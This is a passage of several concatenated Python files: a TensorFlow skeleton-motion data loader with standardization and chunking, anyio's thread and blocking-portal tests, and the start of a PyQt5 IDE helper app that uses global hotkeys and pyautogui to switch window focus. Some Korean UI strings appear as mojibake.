        if os.path.isfile(test):
            ps.append((src, test, src in no_individual_cov))
    result = list(itertools.starmap(start_pytest, ps))
    if any(e != 0 for _, _, e in result):
        sys.exit(1)
if __name__ == '__main__':
main()
|
skeleton_reader_standardize.py | import fnmatch
import os
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
def normalizationStats(completeData):
    """Return the per-dimension mean and std of completeData.

    completeData: (num_frames, dim) array; statistics are taken over axis 0.
    Returns (data_mean, data_std), each of shape (dim,).
    """
    # BUG FIX: the original placed its description as a bare string just
    # before the return (not a docstring) and claimed a third return value
    # ("dimensions with small std") that was never returned.
    data_mean = np.mean(completeData, axis=0)
    data_std = np.std(completeData, axis=0)
    return data_mean, data_std
def normalizeTensor(inputTensor, data_mean, data_std):
    """Standardize a 3-D tensor with per-dimension statistics.

    inputTensor: (A, B, dim) array; data_mean / data_std: length-dim vectors.
    Returns (inputTensor - mean) / std, same shape as inputTensor.

    Uses NumPy broadcasting instead of the original triple np.repeat, which
    materialized two full-size temporaries; the result is identical.
    """
    dim = inputTensor.shape[2]
    mean = np.asarray(data_mean).reshape((1, 1, dim))
    std = np.asarray(data_std).reshape((1, 1, dim))
    return (inputTensor - mean) / std
# prepare data for training from csv files.
# each csv file contain N x 45 parentToChildVect for one subject
# data prepared as list of length N, with each element a T x 42 matrix (without root) or T x 45 matrix (with root)
# T = len_sample, N = num_sample
# len_samples == chunk length
def sample_data(input_data, len_samples, bWithRoot, bDiffRootLoc):
    """Slice input_data (frames x dim) into overlapping training chunks.

    Each chunk has len_samples + 1 frames; the window start advances by 25
    frames. With bWithRoot all columns are kept (the chunk is copied so the
    input is never aliased); otherwise the first 3 root columns are dropped.
    With bWithRoot and bDiffRootLoc the root location is re-expressed
    relative to the chunk's first frame. Chunks containing NaN are dropped.

    BUG FIX: the original ended by referencing bAugRootLoc /
    AugmentRootLocation, neither of which is defined anywhere in this
    module, so every call raised NameError. The dead augmentation hook has
    been removed; the "%d -> %d" log format is preserved.
    """
    overall_sampled_data = []
    window_shift = 25
    start_frame = 0
    while start_frame + len_samples + 1 < input_data.shape[0]:
        s_t = start_frame
        e_t = start_frame + len_samples + 1
        if bWithRoot:
            # Copy: the root columns may be edited in place below.
            chunk = np.copy(input_data[s_t:e_t, :])
        else:
            chunk = input_data[s_t:e_t, 3:]  # (len_samples+1) x (dim-3)
        if bWithRoot and bDiffRootLoc:
            # Root location relative to the chunk's first frame.
            init_root = np.tile(chunk[0, 0:3], (chunk.shape[0], 1))
            chunk[:, 0:3] = chunk[:, 0:3] - init_root
        if not np.isnan(np.max(chunk)):
            overall_sampled_data.append(chunk)
        start_frame = start_frame + window_shift
    chunk_count = len(overall_sampled_data)
    print('chunkNum: %d -> %d' % (chunk_count, chunk_count))
    return overall_sampled_data
# with rotation normalization such that first frame of each chunk faces z direction (0,0,1)
'''
def sample_data_rotNom(input_data, len_samples, bWithRoot, bDiffRootLoc):
overall_sampled_data = []
# i = 0;
window_shift = 25
tempStartFrame = 0
while tempStartFrame + len_samples + 1 < input_data.shape[0]:
# if (i+1)*(len_samples+1) >= input_data.shape[0]:
# break
s_t = tempStartFrame
e_t = tempStartFrame + len_samples + 1
if bWithRoot:
sample_data = np.copy(input_data[s_t:e_t, :]) # should make a copy instead of aliasing
# sample_data[:, 0:3] = sample_data[:, 0:3]/100;
# sample_data[:, 1:3] = sample_data[:, 1:3]/100;
else:
sample_data = input_data[s_t:e_t, 3:] # (W+1) x dim
if bWithRoot and bDiffRootLoc:
initRoot = sample_data[0, 0:3];
initRoot = np.tile(initRoot, (sample_data.shape[0], 1))
sample_data[:, 0:3] = sample_data[:, 0:3] - initRoot;
# Apply rotation normalization
sample_data_3d = sample_data.reshape(sample_data.shape[0], sample_data.shape[1] / 3, 3); # 101x15x3
rot2z = input_data_rot2Z[s_t, :]; # 1x9
rot2z = rot2z.reshape(3, 3);
rot2z = rot2z.transpose(); # 3x3...Not sure transpose is needed.. should check
for i in np.arange(0, sample_data_3d.shape[0]):
tempPose = sample_data_3d[i, :, :]; # 15x3
tempPose = tempPose.transpose() # 3x15
tempPose = np.dot(rot2z, tempPose); # 3x15 , rotated
sample_data_3d[i, :, :] = tempPose.transpose();
sample_data = sample_data_3d.reshape(sample_data.shape[0], sample_data.shape[1]);
# print np.max(sample_data[:, 1])
if not np.isnan(np.max(sample_data)):
overall_sampled_data.append(sample_data)
# print 'Nan is detected, but ignored'
# else:
# overall_data.append([class_ids[x] fddor x in sample_text])
# i = i + 1
tempStartFrame = tempStartFrame + window_shift
initLength = len(overall_sampled_data)
finalLength = initLength
if bAugRootLoc:
overall_sampled_data = AugmentRootLocation(overall_sampled_data)
finalLength = len(overall_sampled_data)
print ('chunkNum: %d -> %d' % (initLength, finalLength))
return overall_sampled_data
'''
def sample_data_rotNom(input_data, len_samples, bWithRoot, bDiffRootLoc):
    # Chunk input_data into windows of len_samples+1 frames (consecutive
    # chunks share one boundary frame), convert the root location into
    # frame-to-frame deltas, and rotate each chunk so its first frame's
    # shoulder line faces a canonical horizontal direction.
    # Requires dim == 45 (15 joints x 3 coords, given the reshapes below).
    #
    # NOTE(review): bWithRoot / bDiffRootLoc are accepted but never used —
    # the root columns are always kept and always differenced; confirm
    # callers expect this.
    # NOTE(review): `sample` is a *view* of input_data, so the in-place
    # differencing below mutates the caller's array — verify that is
    # intended.
    overall_data = []
    i = 0
    while (i + 1) * (len_samples + 1) < input_data.shape[0]:
        # NOTE(review): the loop bound multiplies by (len_samples + 1) but
        # the slice advances by len_samples, so the last possible chunk can
        # be skipped — confirm.
        s_t = int(i * len_samples)
        e_t = int((i + 1) * len_samples + 1)
        sample = input_data[s_t:e_t, :]
        # Root (first 3 columns) becomes per-frame displacement; the first
        # frame of every chunk is pinned to the origin ("center of the dome").
        sample[1:, :3] = sample[1:, :3] - sample[:-1, :3]
        sample[0, :3] = 0
        # Normalize orientation: view the chunk as (frames, 15, 3) and build
        # the shoulder vector (joint 3 minus joint 9) of the first frame,
        # projected to the horizontal plane and normalized.
        sample_reshape = sample.reshape((sample.shape[0], 15, 3))
        shoulder = sample_reshape[0,3,:] - sample_reshape[0,9,:]
        shoulder[1] = 0
        shoulder = shoulder/np.linalg.norm(shoulder)
        # Rotation about the vertical (y) axis aligning the shoulder with z.
        R = np.array([[shoulder[2], 0, -shoulder[0]], [0, 1, 0], [shoulder[0], 0, shoulder[2]]])
        #print 'R det:{0}'.format(np.linalg.det(R))
        #print 'R.T - inv(R)={0}'.format(R.T - np.linalg.inv(R))
        sample_reshape = np.dot(sample_reshape, R.T)
        sample_out = sample_reshape.reshape((sample_reshape.shape[0], 45))
        overall_data.append(sample_out)
        i = i + 1
    # overall_data = np.array(overall_data,dtype=np.float64)
    # train_data = overall_data[:,:-1,3:]
    # label_data = overall_data[:,1:,3:]
    return overall_data
def createTrain(datadir, num_samples=1000, len_samples=25,
                bWithRoot=0, data_mean=None, data_std=None, testingSeq=None,
                bDiffRootLoc=0, bNormRootRot=0):
    """Walk datadir (scene/subject CSV layout) and build a standardized
    training tensor.

    testingSeq, if given, is a flat [scene0, sub0, scene1, sub1, ...] list
    of held-out sequences to skip. Returns (train_data, data_mean, data_std)
    where train_data has shape (chunk_len, num_chunks, dim) — time leading.
    num_samples is currently unused (kept for interface compatibility).
    """
    overall_data = []
    for scene in os.listdir(datadir):
        subjects = os.listdir(os.path.join(datadir, scene))
        print('scene {0} has {1} subjects'.format(scene, len(subjects)))
        for sub in subjects:
            filename = os.path.join(datadir, scene, sub)
            # Skip directories and auxiliary rotation files (names ending 'z').
            if os.path.isdir(filename) or sub[-1] == 'z':
                continue
            # Skip held-out test sequences.
            bSkip = False
            if testingSeq is not None:
                # BUG FIX: the original iterated range(0, len(testingSeq) / 2, 2)
                # — a TypeError on Python 3 (float range bound), and even as
                # intended it only checked the first half of the
                # (scene, subject) pairs. Iterate all pairs.
                # NOTE(review): the original also appeared to `break` out of
                # the subjects loop on a match; skipping just this subject
                # (continue) looks like the real intent — confirm.
                for i in range(0, len(testingSeq), 2):
                    if testingSeq[i] == scene and testingSeq[i + 1] == sub:
                        print('Skip test data: %s' % filename)
                        bSkip = True
                        break
            if bSkip:
                continue
            overall_data_sub = createTrainSubject(filename, len_samples, bWithRoot, bDiffRootLoc, bNormRootRot)
            if overall_data_sub is None:
                continue
            overall_data.extend(overall_data_sub)
    overall_data = np.array(overall_data, dtype=np.float32)  # (chunkNum, chunkLen+1, dim)
    overall_data = np.swapaxes(overall_data, 0, 1)  # (chunkLen+1, chunkNum, dim)
    train_data = overall_data[:-1, :, :]  # drop the final frame of each chunk
    overall_data_2d = overall_data.reshape(overall_data.shape[0] * overall_data.shape[1], overall_data.shape[2])
    if np.isnan(np.max(overall_data_2d)):
        print('Warning!!!: completeRawData:: Nan is detected.')
    else:
        print('Good!: completeRawData:: Nan is not detected.')
    # Compute statistics only when the caller did not supply them.
    if (data_mean is None) and (data_std is None):
        data_mean, data_std = normalizationStats(overall_data_2d)
    train_data = normalizeTensor(train_data, data_mean, data_std)
    return train_data, data_mean, data_std
def createTrainSubject(filename, len_samples, bWithRoot, bDiffRootLoc, bNormRootRot):
    """Load one subject's CSV motion file and chunk it into training samples.

    Returns a list of (len_samples+1, dim) chunks, or None when the
    sequence is too short (< 100 frames). NaN content is only warned about;
    per-chunk NaN filtering happens inside sample_data.
    """
    raw_data = np.loadtxt(filename, delimiter=',')
    print('frame_length: %d' % raw_data.shape[0])
    if raw_data.shape[0] < 100:
        # BUG FIX: previously `return None, None` — a 2-tuple, which is not
        # `None`, so the caller's `is None` guard never fired and the tuple
        # of Nones leaked into the training data.
        return None
    if np.isnan(np.max(raw_data)):
        print('Warning: Nan is detected: {0}'.format(filename))
    if bNormRootRot:
        # Rotation-normalized chunking: each chunk's first frame is rotated
        # to face a canonical direction.
        return sample_data_rotNom(raw_data, len_samples, bWithRoot, bDiffRootLoc)
    return sample_data(raw_data, len_samples, bWithRoot, bDiffRootLoc)
class SkeletonReader(object):
    '''Generic background skeleton-data reader that preprocesses motion
    chunks and enqueues them into a TensorFlow queue (TF1 queue API).'''

    def __init__(self,
                 skeleton_dir,
                 coord,
                 sample_size=None,
                 queue_size=256):
        """
        skeleton_dir: root directory scanned for scene/subject CSV files.
        coord: coordinator used to stop the feeder threads.
        sample_size: chunk length T; each queue element is a (T, 42) sample.
        queue_size: capacity of the shuffle queue.
        """
        self.skeleton_dir = skeleton_dir
        self.coord = coord
        self.sample_size = sample_size
        self.threads = []
        # One sample is a (T, 42) skeleton chunk.
        # NOTE(review): thread_main loads data with bWithRoot=1, which keeps
        # the 3 root columns (45 dims) — confirm this matches the 42 here.
        self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=(sample_size, 42))
        self.queue = tf.RandomShuffleQueue(capacity=queue_size,
                                           min_after_dequeue=10,
                                           dtypes=['float32'],
                                           shapes=[(sample_size, 42)])
        self.enqueue = self.queue.enqueue([self.sample_placeholder])

    def dequeue(self, num_elements):
        """Return the symbolic op that dequeues num_elements samples."""
        return self.queue.dequeue_many(num_elements)

    def thread_main(self, sess):
        """Feeder loop: load and standardize all chunks once, then enqueue
        them repeatedly until the coordinator requests a stop."""
        stop = False
        # BUG FIX: the original passed an undefined global `datadir` to
        # createTrain (NameError); use the configured skeleton_dir instead.
        # NOTE(review): createTrain returns a time-leading tensor
        # (chunk_len, num_chunks, dim); indexing axis 0 below assumes
        # chunk-leading order — confirm which layout is intended.
        [train_data, data_mean, data_std] = createTrain(
            self.skeleton_dir, num_samples=1000, len_samples=self.sample_size,
            bWithRoot=1, data_mean=None, data_std=None, testingSeq=None,
            bDiffRootLoc=1, bNormRootRot=1)
        while not stop:
            for index in range(train_data.shape[0]):
                if self.coord.should_stop():
                    stop = True
                    break
                piece = train_data[index, :, :]
                # Feed one standardized chunk into the shuffle queue.
                sess.run(self.enqueue, feed_dict={self.sample_placeholder: piece})

    def start_threads(self, sess, n_threads=1):
        """Spawn n_threads daemon feeder threads running thread_main."""
        for _ in range(n_threads):
            thread = threading.Thread(target=self.thread_main, args=(sess,))
            thread.daemon = True  # Thread will close when parent quits.
            thread.start()
            self.threads.append(thread)
        return self.threads
|
test_threads.py | import asyncio
import sys
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress
import pytest
from anyio import (
create_blocking_portal, create_capacity_limiter, create_event, create_task_group,
get_cancelled_exc_class, get_current_task, run, run_async_from_thread, run_sync_from_thread,
run_sync_in_worker_thread, sleep, start_blocking_portal, wait_all_tasks_blocked)
if sys.version_info < (3, 7):
current_task = asyncio.Task.current_task
else:
current_task = asyncio.current_task
pytestmark = pytest.mark.anyio
async def test_run_async_from_thread():
    """run_async_from_thread() must execute the coroutine on the event loop thread."""
    loop_thread = threading.get_ident()

    async def add(x, y):
        assert threading.get_ident() == loop_thread
        return x + y

    def from_thread(x, y):
        assert threading.get_ident() != loop_thread
        return run_async_from_thread(add, x, y)

    assert await run_sync_in_worker_thread(from_thread, 1, 2) == 3
async def test_run_sync_from_thread():
    """run_sync_from_thread() must execute the callable on the event loop thread."""
    loop_thread = threading.get_ident()

    def add(x, y):
        assert threading.get_ident() == loop_thread
        return x + y

    def from_thread(x, y):
        assert threading.get_ident() != loop_thread
        return run_sync_from_thread(add, x, y)

    assert await run_sync_in_worker_thread(from_thread, 1, 2) == 3
def test_run_sync_from_thread_pooling():
    """Consecutive worker-thread calls should be served by one pooled thread."""
    async def main():
        seen = {await run_sync_in_worker_thread(threading.get_ident) for _ in range(5)}
        # All five calls must land on the same worker thread, which is not
        # the event loop thread itself.
        assert len(seen) == 1
        assert seen.pop() != threading.get_ident()
        assert threading.active_count() == initial_count + 1

    initial_count = threading.active_count()
    run(main, backend='asyncio')
    # The pooled worker thread is torn down together with the event loop
    assert threading.active_count() == initial_count
async def test_run_async_from_thread_exception():
    """Exceptions raised by the coroutine propagate back through the worker thread."""
    loop_thread = threading.get_ident()

    async def add(x, y):
        assert threading.get_ident() == loop_thread
        return x + y

    def from_thread(x, y):
        assert threading.get_ident() != loop_thread
        return run_async_from_thread(add, x, y)

    with pytest.raises(TypeError) as exc_info:
        await run_sync_in_worker_thread(from_thread, 1, 'foo')
    exc_info.match("unsupported operand type")
async def test_run_sync_from_thread_exception():
    """Exceptions raised by the sync callable propagate back through the worker thread."""
    loop_thread = threading.get_ident()

    def add(x, y):
        assert threading.get_ident() == loop_thread
        return x + y

    def from_thread(x, y):
        assert threading.get_ident() != loop_thread
        return run_sync_from_thread(add, x, y)

    with pytest.raises(TypeError) as exc_info:
        await run_sync_in_worker_thread(from_thread, 1, 'foo')
    exc_info.match("unsupported operand type")
async def test_run_anyio_async_func_from_thread():
    """AnyIO's own async functions are callable through run_async_from_thread()."""
    def call_sleep(*delays):
        run_async_from_thread(sleep, *delays)
        return True

    assert await run_sync_in_worker_thread(call_sleep, 0)
async def test_run_in_thread_cancelled():
    """Cancelling before the thread dispatch: the worker thread never runs and
    the code after the await is skipped (state stays 1)."""
    def thread_worker():
        nonlocal state
        state = 2
    async def worker():
        nonlocal state
        state = 1
        await run_sync_in_worker_thread(thread_worker)
        state = 3
    state = 0
    async with create_task_group() as tg:
        tg.spawn(worker)
        tg.cancel_scope.cancel()
    # state == 1: thread_worker (state = 2) never executed and neither did
    # the post-await assignment (state = 3)
    assert state == 1
async def test_run_in_thread_exception():
    """Exceptions raised in the worker thread propagate to the awaiting task."""
    def boom():
        raise ValueError('foo')

    with pytest.raises(ValueError) as exc_info:
        await run_sync_in_worker_thread(boom)
    exc_info.match('^foo$')
async def test_run_in_custom_limiter():
    """With a CapacityLimiter(3), at most 3 of the 4 queued thread calls run
    concurrently; the fourth waits for a token."""
    def thread_worker():
        nonlocal num_active_threads, max_active_threads
        num_active_threads += 1
        max_active_threads = max(num_active_threads, max_active_threads)
        # Block until the test releases all workers at once
        event.wait(1)
        num_active_threads -= 1
    async def task_worker():
        await run_sync_in_worker_thread(thread_worker, limiter=limiter)
    event = threading.Event()
    num_active_threads = max_active_threads = 0
    limiter = create_capacity_limiter(3)
    async with create_task_group() as tg:
        for _ in range(4):
            tg.spawn(task_worker)
        await sleep(0.1)
        assert num_active_threads == 3
        assert limiter.borrowed_tokens == 3
        event.set()
    assert num_active_threads == 0
    assert max_active_threads == 3
def test_run_async_from_unclaimed_thread():
    """Calling run_async_from_thread() outside an AnyIO worker thread must fail."""
    async def noop():
        pass

    exc_info = pytest.raises(RuntimeError, run_async_from_thread, noop)
    exc_info.match('This function can only be run from an AnyIO worker thread')
def test_run_sync_from_unclaimed_thread():
    """Calling run_sync_from_thread() outside an AnyIO worker thread must fail."""
    def noop():
        pass

    exc_info = pytest.raises(RuntimeError, run_sync_from_thread, noop)
    exc_info.match('This function can only be run from an AnyIO worker thread')
@pytest.mark.parametrize('cancellable, expected_last_active', [
    (False, 'task'),
    (True, 'thread')
], ids=['uncancellable', 'cancellable'])
async def test_cancel_worker_thread(cancellable, expected_last_active):
    """
    Test that when a task running a worker thread is cancelled, the cancellation is not acted on
    until the thread finishes.
    """
    def thread_worker():
        nonlocal last_active
        # Let the test know the thread is running, then simulate slow work
        run_sync_from_thread(sleep_event.set)
        time.sleep(0.2)
        last_active = 'thread'
        run_sync_from_thread(finish_event.set)
    async def task_worker():
        nonlocal last_active
        try:
            await run_sync_in_worker_thread(thread_worker, cancellable=cancellable)
        finally:
            last_active = 'task'
    sleep_event = create_event()
    finish_event = create_event()
    last_active = None
    async with create_task_group() as tg:
        tg.spawn(task_worker)
        await sleep_event.wait()
        # Cancel while the thread is mid-sleep
        tg.cancel_scope.cancel()
    # 'task' if the task waited for the thread; 'thread' if it was abandoned
    await finish_event.wait()
    assert last_active == expected_last_active
@pytest.mark.parametrize('anyio_backend', ['asyncio'])
async def test_cancel_asyncio_native_task():
    """A native asyncio Task blocked on a cancellable worker thread can be
    cancelled via Task.cancel() (asyncio backend only)."""
    async def run_in_thread():
        nonlocal task
        task = current_task()
        await run_sync_in_worker_thread(time.sleep, 1, cancellable=True)
    task = None
    async with create_task_group() as tg:
        tg.spawn(run_in_thread)
        await wait_all_tasks_blocked()
        task.cancel()
class TestBlockingPortal:
    """Tests for the blocking portal: driving an event loop from plain threads."""
    class AsyncCM:
        # Minimal async context manager; __aexit__ returns ``ignore_error``,
        # so a True value swallows the exception raised in the ``with`` body.
        def __init__(self, ignore_error):
            self.ignore_error = ignore_error
        async def __aenter__(self):
            return 'test'
        async def __aexit__(self, exc_type, exc_val, exc_tb):
            return self.ignore_error
    async def test_successful_call(self):
        """portal.call() runs both sync and async callables on the event loop thread."""
        async def async_get_thread_id():
            return threading.get_ident()
        def external_thread():
            thread_ids.append(portal.call(threading.get_ident))
            thread_ids.append(portal.call(async_get_thread_id))
        thread_ids = []
        async with create_blocking_portal() as portal:
            thread = threading.Thread(target=external_thread)
            thread.start()
            await run_sync_in_worker_thread(thread.join)
        for thread_id in thread_ids:
            assert thread_id == threading.get_ident()
    async def test_aexit_with_exception(self):
        """Test that when the portal exits with an exception, all tasks are cancelled."""
        def external_thread():
            try:
                portal.call(sleep, 3)
            except BaseException as exc:
                results.append(exc)
            else:
                results.append(None)
        results = []
        with suppress(Exception):
            async with create_blocking_portal() as portal:
                thread1 = threading.Thread(target=external_thread)
                thread1.start()
                thread2 = threading.Thread(target=external_thread)
                thread2.start()
                await sleep(0.1)
                assert not results
                raise Exception
        await run_sync_in_worker_thread(thread1.join)
        await run_sync_in_worker_thread(thread2.join)
        assert len(results) == 2
        assert isinstance(results[0], CancelledError)
        assert isinstance(results[1], CancelledError)
    async def test_aexit_without_exception(self):
        """Test that when the portal exits, it waits for all tasks to finish."""
        def external_thread():
            try:
                portal.call(sleep, 0.2)
            except BaseException as exc:
                results.append(exc)
            else:
                results.append(None)
        results = []
        async with create_blocking_portal() as portal:
            thread1 = threading.Thread(target=external_thread)
            thread1.start()
            thread2 = threading.Thread(target=external_thread)
            thread2.start()
            await sleep(0.1)
            assert not results
        await run_sync_in_worker_thread(thread1.join)
        await run_sync_in_worker_thread(thread2.join)
        assert results == [None, None]
    async def test_call_portal_from_event_loop_thread(self):
        """Calling the portal from the event loop thread itself must be rejected."""
        async with create_blocking_portal() as portal:
            exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
            exc.match('This method cannot be called from the event loop thread')
    def test_start_with_new_event_loop(self, anyio_backend_name, anyio_backend_options):
        """start_blocking_portal() spins up its own event loop in another thread."""
        async def async_get_thread_id():
            return threading.get_ident()
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            thread_id = portal.call(async_get_thread_id)
        assert isinstance(thread_id, int)
        assert thread_id != threading.get_ident()
    def test_start_with_nonexistent_backend(self):
        """An unknown backend name raises LookupError."""
        with pytest.raises(LookupError) as exc:
            with start_blocking_portal('foo'):
                pass
        exc.match('No such backend: foo')
    def test_call_stopped_portal(self, anyio_backend_name, anyio_backend_options):
        """Calling a portal after its context has exited raises RuntimeError."""
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            pass
        pytest.raises(RuntimeError, portal.call, threading.get_ident).\
            match('This portal is not running')
    def test_spawn_task(self, anyio_backend_name, anyio_backend_options):
        """spawn_task() returns a future resolving to the task's return value."""
        async def event_waiter():
            await event1.wait()
            event2.set()
            return 'test'
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            event1 = portal.call(create_event)
            event2 = portal.call(create_event)
            future = portal.spawn_task(event_waiter)
            portal.call(event1.set)
            portal.call(event2.wait)
            assert future.result() == 'test'
    def test_spawn_task_cancel_later(self, anyio_backend_name, anyio_backend_options):
        """A spawned task can be cancelled through its future after it has started."""
        async def noop():
            await sleep(2)
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            future = portal.spawn_task(noop)
            portal.call(wait_all_tasks_blocked)
            future.cancel()
        assert future.cancelled()
    def test_spawn_task_cancel_immediately(self, anyio_backend_name, anyio_backend_options):
        """Cancelling the future right after spawning cancels the task."""
        async def event_waiter():
            nonlocal cancelled
            try:
                await sleep(3)
            except get_cancelled_exc_class():
                cancelled = True
        cancelled = False
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            future = portal.spawn_task(event_waiter)
            future.cancel()
        assert cancelled
    def test_spawn_task_with_name(self, anyio_backend_name, anyio_backend_options):
        """The name= argument is applied to the spawned task."""
        async def taskfunc():
            nonlocal task_name
            task_name = get_current_task().name
        task_name = None
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            portal.spawn_task(taskfunc, name='testname')
        assert task_name == 'testname'
    def test_async_context_manager_success(self, anyio_backend_name, anyio_backend_options):
        """wrap_async_context_manager() exposes an async CM as a sync one."""
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
                assert cm == 'test'
    def test_async_context_manager_error(self, anyio_backend_name, anyio_backend_options):
        """When __aexit__ returns False, the body's exception propagates."""
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            with pytest.raises(Exception) as exc:
                with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
                    assert cm == 'test'
                    raise Exception('should NOT be ignored')
            exc.match('should NOT be ignored')
    def test_async_context_manager_error_ignore(self, anyio_backend_name, anyio_backend_options):
        """When __aexit__ returns True, the body's exception is swallowed."""
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(True)) as cm:
                assert cm == 'test'
                raise Exception('should be ignored')
    def test_start_no_value(self, anyio_backend_name, anyio_backend_options):
        """start_task() with a bare started() call yields value None."""
        def taskfunc(*, task_status):
            task_status.started()
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            future, value = portal.start_task(taskfunc)
            assert value is None
            assert future.result() is None
    def test_start_with_value(self, anyio_backend_name, anyio_backend_options):
        """start_task() returns the value passed to started()."""
        def taskfunc(*, task_status):
            task_status.started('foo')
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            future, value = portal.start_task(taskfunc)
            assert value == 'foo'
            assert future.result() is None
    def test_start_crash_before_started_call(self, anyio_backend_name, anyio_backend_options):
        """A crash before started() surfaces directly from start_task()."""
        def taskfunc(*, task_status):
            raise Exception('foo')
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            with pytest.raises(Exception, match='foo'):
                portal.start_task(taskfunc)
    def test_start_crash_after_started_call(self, anyio_backend_name, anyio_backend_options):
        """A crash after started() surfaces from the future, not start_task()."""
        def taskfunc(*, task_status):
            task_status.started(2)
            raise Exception('foo')
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            future, value = portal.start_task(taskfunc)
            assert value == 2
            with pytest.raises(Exception, match='foo'):
                future.result()
    def test_start_no_started_call(self, anyio_backend_name, anyio_backend_options):
        """A task that exits without calling started() raises RuntimeError."""
        def taskfunc(*, task_status):
            pass
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            with pytest.raises(RuntimeError, match='Task exited'):
                portal.start_task(taskfunc)
    def test_start_with_name(self, anyio_backend_name, anyio_backend_options):
        """start_task() honours the name= argument."""
        def taskfunc(*, task_status):
            task_status.started(get_current_task().name)
        with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
            future, start_value = portal.start_task(taskfunc, name='testname')
            assert start_value == 'testname'
|
main.py | # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import sys, os, threading, queue, pyautogui, time
from multiprocessing.managers import BaseManager
import ctypes
import keyboard
sys.path.append(os.path.abspath('..'))
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5 import QtGui, QtCore, QtWidgets
from PyQt5 import uic
import procs.wind as wind
from procs.stt import RecognitionManager
import procs.makeTree as makeTree
import procs.kComm as kComm
import html
from macro import *
form_class = uic.loadUiType("prototype.ui")[0]
child_class = uic.loadUiType("child.ui")[0]
MODES=['๋ช
๋ น', 'ํ์', '๋ณด๊ธฐ']
USRLIB=ctypes.windll.LoadLibrary('user32.dll')
class HelpWindow(QDialog):
    """Frameless, always-on-top help dialog loaded from Help.ui.

    Painting and dragging are delegated to a Roundener instance so the
    dialog gets the application's rounded, draggable look.
    """

    def __init__(self, parent):
        super(HelpWindow, self).__init__(parent)
        uic.loadUi("Help.ui", self)
        window_flags = QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.Dialog
        self.setWindowFlags(window_flags)
        self.termButton.clicked.connect(self.close)
        self.roundener = Roundener(self)
        self.show()

    def paintEvent(self, event):
        # Rounded background is drawn by the helper
        self.roundener.paintEvent(event)

    def mousePressEvent(self, event):
        self.roundener.mousePressEvent(event)
        super().mousePressEvent(event)

    def mouseMoveEvent(self, event):
        self.roundener.mouseMoveEvent(event)
        super().mouseMoveEvent(event)

    def mouseReleaseEvent(self, event):
        self.roundener.mouseReleaseEvent(event)
        super().mouseReleaseEvent(event)
class PeekerWindow(QDialog):
    """Frameless always-on-top popup that previews a slice of a source file.

    ``sel`` is a search-result record: a single-element record appears to
    mean "whole file", otherwise it carries a filename plus (line, column)
    start/end positions -- inferred from the slicing below; confirm.
    """
    def __init__(self, sel, parent):
        super().__init__()
        if len(sel) != 1:
            fname=sel[1]
            fname=makeTree.rel2abs[fname]
            sp=sel[2]
            rp=sel[3]
        else:
            fname=sel[0]
            fname=makeTree.rel2abs[fname]
            sp=(1,1)
            rp=(-1,-1)
        self.setupUI(fname)
        self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
        self.hIdeWnd=parent.hIdeWnd
        self.pIdeWnd=parent.pIdeWnd
        self.base=parent
        # Home+End toggles focus between this window and the IDE (setToggle)
        self.funct1=keyboard.add_hotkey('home+end', callback=self.setToggle)
        # self.tid=threading.get_native_id()
        self.DISP_NO=20 # number of lines displayed at a time
        # Place the popup above or below the parent depending on screen space
        if (parent.y()+160+350) > QDesktopWidget().availableGeometry().height():
            self.move(parent.x()-175, parent.y()-400)
        else:
            self.move(parent.x()-175, parent.y()+160)
        # Read the file, falling back from UTF-8 to cp949 on decode errors
        try:
            f=open(fname, encoding='UTF-8')
            lines=f.readlines()
        except UnicodeDecodeError:
            f.close()
            f=open(fname, encoding='cp949')
            lines=f.readlines()
        f.close()
        # Keep only the selected span; trim first/last line by column
        self.content=lines[sp[0]-1:rp[0]]
        self.content[0]=self.content[0][sp[1]-1:]
        self.content[-1]=self.content[-1][:rp[1]]
        self.scr=0 # scroll offset: index of the topmost displayed line
        self.lim=len(self.content)-self.DISP_NO
        self.printContent()
        self.roundener=Roundener(self)
    def setupUI(self, fname):
        """Build the static layout: filename label, content label, usage hint."""
        layout = QtWidgets.QVBoxLayout(self)
        self.label=QtWidgets.QLabel('content', self)
        self.label.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
        layout.addWidget(QtWidgets.QLabel(fname,self))
        layout.addWidget(self.label)
        layout.addWidget(QtWidgets.QLabel('Home+End๋ก IDE์ ์ฃผ๋ชฉ์ ์ด๋ํ ์ ์์ต๋๋ค.', self))
        self.setMinimumWidth(600)
        self.setMinimumHeight(350)
    def setToggle(self, dummy=None):
        """Home+End hotkey: focus the IDE, or click back into this window."""
        if USRLIB.GetForegroundWindow() != self.hIdeWnd:
            USRLIB.SetForegroundWindow(self.hIdeWnd)
        else:
            # Click into this window, then restore the cursor position
            cp=self.pos()
            x, y=pyautogui.position()
            pyautogui.click(cp.x()+30, cp.y()+30)
            pyautogui.moveTo(x, y)
